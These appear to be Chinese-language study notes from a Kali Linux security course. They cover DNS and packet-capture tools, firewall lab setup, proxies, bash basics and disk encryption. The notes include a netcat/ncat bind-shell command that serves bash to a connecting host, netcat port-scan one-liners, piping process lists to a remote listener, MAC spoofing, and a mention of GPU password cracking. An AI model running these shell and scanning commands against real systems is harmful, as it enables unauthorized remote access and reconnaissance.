nslookup
     set type(或者用)=mx
    set type=a
     set type=ns
     set q=ptr
     server 8.8.8.8  (更换DNS服务器，更换后会导致解析的ip地址不同，因为采用的是只能DNS)
     set q=any
      （text结果显示的是spf记录，用来做反垃圾邮件，通过spf反向查询，域名与来源ip是否一致，如果一致匹配上，证明是正确的邮件服务器发来的 ，而不是伪造的邮件）
        nslookup -q=any 163.com 114.114.114.114(指定特定dns来解析any记录)
        （做一下dns上的spf，这样可以让设定spf的接收方接受邮件）

tcpdump:

    tcpdump -i eth0 -s 0 -w a.cap(-i指定端口 -s指定大小，0为有多少抓多少 -w写入到那个文件)
    tcpdupmp -r a.cap（读取抓包，加-A 以asc码方式显示，加-X 以十六进制读取）
    tcpdump -i eth0 tcp port 22 (指定筛选抓包，且不存文件实时显示)

过程文档记录：
Dradis （短期临时小团队文件共享/各种插件导入文件）
keepnote
truecrypt
 

SYN
SYN,ACK
ACK
(三次握手)
（nc不加密）A:  nc -lp 333 -c bash
B:  nc -nv 10.1.1.1 333

(ncat加密)A：ncat -lp 333 -c bash --ssl
B: ncat -nv 10.1.1.1 333 --ssl

三种软件： wireshark /          sniffer/             cascad pilot（riverbed收购）

一般防火墙都会禁止远程连接，所以可以通过受控段主动提供bas

man nc(系统软件调用手册)（不同系统的nc使用方法不同）

wireshark 会有个权限的报错，直接跳过就可以。

nc -nvz 10.1.1.1 1-65535 (默认扫描TCP端口)
nc -nvzu 10.1.1.1 1-65535(扫描utp端口)

电子取证，要拷贝磁盘级的拷贝。（dd命令，硬盘块级别）

NC-------不建议用它进行域名解析，直接搞ip+端口
nc -h 查看帮助
（mtr 220.118.18.11 追踪路由）
-v（显示详细信息）
-n（不进行DNS解析）
（base64  然后 输入要改换的东西，再用USER   ****  来登陆）

   传输文本信息，需要首先一台机器打开一个端口（listening    nc -l -p 4444打开4444端口，侦听），再用另外一台机器连接这个端口（nc -nv ‘ip’ 4444）
    电子取证时，要尽可能减少数据的增删，可以通过先打开目的主机的 nc 开端口，再用个人主机通过通道来获取信息（ls -l | nc -nv 4444   ////////  ps aux | nc -nv 10.1.1.10 4444 -q 1 这里-q 1是指执行完命令后间隔一秒断开，为了确定是不是结束 ）再另外一端可以 nc -l -p 4444>lsof.txt这样将收到的信息存储到文档中

初始化aql：sudo mysql -initialize
一系列安装配置：mysql_secure_installation配置完成它

进入mysql：mysql -u root -p
再安装php5及其基本组件： sudo apt-get install php5-mysql php-pear php5-mcrypt php5-curl
创建php页面来测试安装：cd /var/www/html，然后 ls然后新建个网页 vi 1.php
       <?php phpinfo();?>
       ie打开 ip/1.php
然后删除 sudo rm 1.php
 sudo init 0 （0-6各个状态）关机Metasploitable2
有个问题，不能完成测试：
cd /var/www/mutillidac/
sudo vi config.inc
其中 需要改成dbname=‘owasp10’（首先要用sudo su root 的权限 再用nano打开编辑）

m0n0wall防火墙的设定
首先要在virtualbox设置全局设定，创建一个“仅主机Host-Only网络”新创建一个网卡，（10.1.1.1 /10.1.2.1），m0n0虚拟机要四个网卡启用，网卡一桥接，网卡二host-only（使用第一个虚拟网卡），网卡三host-only（使用第二个虚拟网卡），启动后首先选择光驱iso文件，然后启动后先（7.install）安装，设置完名称之后，会重启，重启前要关闭掉光驱，否则会再次进去安装，再次进入系统，选择（1.assign）设置网口，yes设置网络通信，再设置三块网卡的vlan tag（em0 10vlan/em1 11vlan/em2 12vlan），再将em1设置成接入lan，再将em0接入wan接口，再将em2设置为dmz（option1）区的接口------重启后在选择（2）给lan口设置ip地址10.1.1.10   掩码为24位（三个255）启用dhcp，在输入网段起始地址10.1.1.20，终止10.1.1.100，81个地址，此时可以通过web界面配置了，但是还要（3）先设置下web界面的密码,就可以用虚拟机链接了。

打开linux，选择网络是第一块网卡，记得全局设定的DHCP，这样才能分配到指定ip，打开浏览器，10.1.1.10， admin   mono
，进去后先配置网卡接口，lan口已经配置好了，wan口用DHCP，opt接口启用，指定10.1.2.10
上网要设置rules，action=pass  protocal=any   source设置来源例如lan，那么只有lan内局域网可以上网  ，调整规则,②默认的wan口上面，最后有一个选项是block所有的数据包通信。

检查端口：netstat - pantu | grep 939

openvas -check setup 检查系统安装完成

openvas- feed- update 更新

https：//129.0.0.1:9392

chown -R root:root 文件 （将文件及其子目录用户组全部改成root）

crul -v http：//www.sina.com （访问网页的html）

wget 下载网址（下载文件）

------------------------------------------------    代理设置

网页
/etc/apt/apt.conf

Acaquire::ftp::Proxy "ftp://127.0.0.1:8087/";

Acaquire::http::Proxy"ftp://127.0.0.1:8087/";

Acaquire::https::Proxy"ftp://127.0.0.1:8087/";

Acaquire::soucks::Proxy"ftp://127.0.0.1:8087/";

命令行

export ftp_proxy="ftp://user:password@proxyIP:port"

export http_proxy="ftp://user:password@proxyIP:port"

export https_proxy="ftp://user:password@proxyIP:port"

export socks_proxy="ftp://user:password@proxyIP:port"

----------------------------------------------------

代理链proxychain软件（linux强大访问软件）
公开的代理服务器
配置代理链    vi /etc/proxychains.conf

#proxychains iceweasel

tar zxvf 文件夹
ls
mv jdk文件 /opt/  将文件夹移动到bin中
cd /user/bin/
ls -d java 只看java目录这一级别
打开确认java过去了
•update-alternatives --install /usr/bin/java java /opt/jdk文件/bin/java 1
• update-alternatives --install /usr/bin/javac javac /opt/jdk1.7.0_45/bin/javac 1
• update-alternatives --install /usr/lib/mozilla/plugins/libjavaplugin.so mozilla-javaplugin.so /opt/jdk1.7.0_45/jre/lib/amd64/libnpjp2.so 1

• update-alternatives --set java /opt/jdk1.7.0_45/bin/java
• update-alternatives --set javac /opt/jdk1.7.0_45/bin/javac
• update-alternatives --set mozilla-javaplugin.so /opt/jdk1.7.0_45/jre/lib/amd64/libnpjp2.so

GPU安装内核驱动，才能利用GPU跑密码

ulimit限制当前窗口线程
vi .bashrc (编辑此文件永久限制)中写入 ulimite -n 900000(这样永久限制打开文件数为900000)

hdparm -i /dev/sda if AdvancedPM=yes then hdparm -B 1 -S 12 /dev/sda

安装virtualbox 增强功能

先apt-get install linux-headers-￥（uname -r）
然后设备-安装增强功能
拷贝出vboxlinuxadditions.run
cd Desktop 然后ls
ls -l 查看权限
chmod+x VBoxLlinuxAdditions.run赋予执行权限
ls -l查看权限，绿色证明可执行
./VBoxLinuxAdditons.run 开始安装 （./）
 

客户端拿到的是sessionID，session存在服务端

cookie中存储sessionID 

snort

security onion

tcpreplay

kali个性化

dhclient eth0

ifconfig eth0 192.168.1.10/24（指定eth0网卡ip为192.168.1.10，掩码为24位）

route add default gw 192.168.1.1（指定网关，之后netatat -nr 查看）

route add -net 172.16.0.0/24 gw 192.169.1.100 eth0（配置网卡路由地址以及添加路由，-net    ：表示后面接的路由为一个网域；指定eth0静态路由发出。指定网关）

配置DNS服务器地址----------配置文件为/etc/resolv.conf           例如： echo nameserver 192.168.1.1 >resolv.conf  将1.1写入到resolv这个DNS配置文件，也可以通过vi命令手动编辑。

=============以上为手动临时指定===
vi /etc/network/interfaces 网卡配置文件（永久更改）  ：将 dhcp改为static ，下面手动输入 adress 192.168.0.1
netmask 255.255.255.0
gateway 192.168.20.2
===========以上必须配置=======
也可以写上 dns-nameserbers
其次up route add -net 172.16.5.0/24 gw 192.168.10.100 eth1（网卡启动后写入这个配置）
 down route del -net 172.24.0.0/24（网卡关闭删除这个配置）
==========================
apt-get update （更新索引文件）
apt-get upgrade(更新程序)
报告错误即 apt-get update --fix-missing
另外因为更新源在国外，所以速度慢，我们可以更换为国内更新源  vi /etc/apt/sources.list(先注释掉#deb，再写入科技大学的更新源，逐行拷贝)

deb http://mirrors.ustc.edu.cn/kali kali main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali main non-free contrib
deb http://mirrors.ustc.edu.cn/kali-security kali/updates main contrib non-free
主要用滚动源deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

apt-get dis-upgrade（debian大版本的更新）
 

BASH命令学

linux 是B shell：绿色----可执行文件   蓝色---目录   白色---普通文件  红色----压缩包文件

clear----清屏

ls------列目录                                             （-l 显示日期等内容  d头为目录  -开头为文件  c开头为设备文件  l开头为链接 b开头为block即块文件）                                                     （-a多显示以 .开头的文件为隐藏文件）          （-h以容易阅读文件呈现文件大小）               （ls -lh --sort=size   以大小排序显示 ）           （ls -lh --sort=time 以日期排序）

cd-----进入目录                                                （cd. 当前目录）      （cd..进入当前目录上级）    pwd-----查看当前工作目录

cat----查看文件内容  例如：cat /var/log/messages                                                 内容太多可以通过more /bar/log/messages逐屏查看文件回车查看下一页，q退出                less /var/log/messages 不显示百分比          tail -20 /var/log/messages查看最后二十行命令（配合watch命令 watch -n 2 tail -20 /var/log/messages每隔两秒钟查看最新二十行messages系统变化，ctrl+c退出）（cat /etc/passwd查看账号）

rm------加文件名，删除文件

cp-------加文件名，copy文件，                例如：cp ps ps1  拷贝ps命名为ps1              cp -r Agent/   A 拷贝文件夹  rm -r  A 删除A

top------查看进程及系统状态，全屏下输入k，杀死进程。 q退出

ps-------专门查看进程（-ef 查看详情） （ps aux 显示cpu内存等）

grep ssh /etc/passwd------------只显示ssh这一行信息

ifconfig----查看当前网络信息  （ifconfig eth0 down 关掉网卡  再macchanger -m 00:11:11:11:11:11 eth0将网卡改为这个mac地址，再通过ifconfig eth0 up启动网卡）

netstate -pantu  查看当前计算机与哪些网络服务器产生tcp与udp连接，

==========小插曲============

linux无法打开优酷，首先确定本机无网络问题，在查看虚拟机，ping后发现返回 unknown host 一定是DNS解析出现问题，再cat /etc/resolv.conf查看DNS配置文件，再vi /etc/resolv.conf 修改DNS服务器地址为本机地址。

==========小插曲============

管道：可以将多个命令，通过同一行输入  例如：netstat -pantu | egrep -v ‘0.0.0.0|:::’| awk '{print $5}'  (第一管道是去除0.0.0.0和：：：，awk是显示第五块数据)  netstat -pantu | egrep -v ‘0.0.0.0|:::’| awk '{print $5}' | egrep -v 'and|Address' | cut -d ':'-f 1(最后的cut也是分块，以：为标记，显示第1块)    netstat -pantu | egrep -v ‘0.0.0.0|:::’| awk '{print $5}' | egrep -v 'and|Address' | cut -d ':'-f 1 | sort | uniq（sort分类，uniq显示不重复）netstat -pantu | egrep -v ‘0.0.0.0|:::’| awk '{print $5}' | egrep -v 'and|Address' | cut -d ':'-f 1 | sort | uniq > ip (输出至ip这个文件中，>>追加而不覆盖)

mount---挂载目录  例如 mount -o loop kali.iso /media/cdrom (将ios挂载在cdrom在通过cd打开)

dmesg-------等同于tail查看/var/log/messages

find----查找安装完的文件或目录  例如：find / -name nmap  从根目录查找所有带有nmap的文件                         find / -iname namap  不区分大小写nmap            find . -name "ps*" -exec cp {}  /tmp/{}.bak \;查找还有ps什么的文件，在附加操作，再复制结果到 tmp下 存为bak格式，最后结束命令
whereis nmap-----查找比find范围小，查找的是本地数据库中记录的应用路径（源码安装不是本地包管理安装，所以不能找到源码安装文件）    whereis -b nmap（查找二进制可执行文件，首先 updatedb一下，这样可以查找最新内容）

echo “hello world”----显示信息

vi----是vim编辑器的简称，首先进入命令模式，输入：来输入（：set nu 显示行号）（：wq 修改保存退出）（摁i，进入编辑状态）（摁esc 退回命令模式）（选行后摁a来添加，摁dd删除所在行，摁o再当前行下插入行，摁y对当前行复制，摁p黏贴）

管道符：（ cat /etc/passwd | grep ssl只显示ssl）（cat /etc/passwd & grep ssl  依次执行）（两个&，前面执行成功才执行后面的）（两个|，前面都没成功才执行后面的）

===========开始写脚本辣=======

先 vi 1.sh                                                      第一行 #！/bin/bash（默认起始行）            echo -n“IP：”(光标不换行，在：后)          read ip(定义ip变量)                                      echo“your ip is :”$ip
保存退出
chmod +x 1.sh（赋予可执行权限）
ls -l  1.sh（查看权限）
./1.sh（执行脚本）
 

本节课是基于live版优盘linux的安装以及加密分区的划分。

dmesg----看一哈你插得对不对啊。是不是sdb，不是sda硬盘别整错咯

GParted（工具）-----先选择对sdb优盘，然后卸载分区，再删除分区，再通过绿色小对勾确定彻底清空

dd命令---------- if（input file 文件拷贝来源）=镜像文件 of（output file 复制给优盘）=/dev/sdb  bs（块复制大小）=1M---------------查看进度 watch -n 5（每五秒） killall -USR1 dd

LUKS:linux unified key setup  磁盘分区级加密-----------分前后端  前端命令cryptesetup --verbose --verfy-passphrase luksFormat /dev/sdb3 (对sdb3进行加密)   cryptsetup luksOpen /dev/sdb3 usb（打开加密位置挂载usb，输入密码后 ls /dev/mapper/usb，之后可以通过mkfs. ext4 /dev/mapper/usb进行文件系统级格式化，再用 e2label /dev/mapper/usb persistence luks必须要求用persistence设置卷标，先创建一个名为usb的目录mkdir -p /mnt/usb，再mount /dev/mapper/usb /munt/usb/只有先创建目录才可以通过目录mount文件，最后echo“/union“>/mnt/usb/persistence.conf配置文件用于运行持久linux时存储-------卸载挂载 umount /dev/mapper/usb，再关闭加密 cryptsetup luksClose /dev/mapper/usb） 

doxbox---windows 磁盘分区级加密

linux中的磁盘分区软件，终端下，执行命令parted---------print devices（列出所有设备）  select /dev/sdb （选定优盘） print（查看分区情况）  mkpart primary 3063 7063（划定主分区 3063起始至7063） quit（退出）

一些基本设置：字体等（gnome-tweak-tool）   流量监控（apt-get install netspeed）  工具栏应用添加（alt+右键）

删除网卡

iw dev wlan0mon interface del

无线路由器功率多大

采用定向天线还是全向天线

pyrit

cowpatty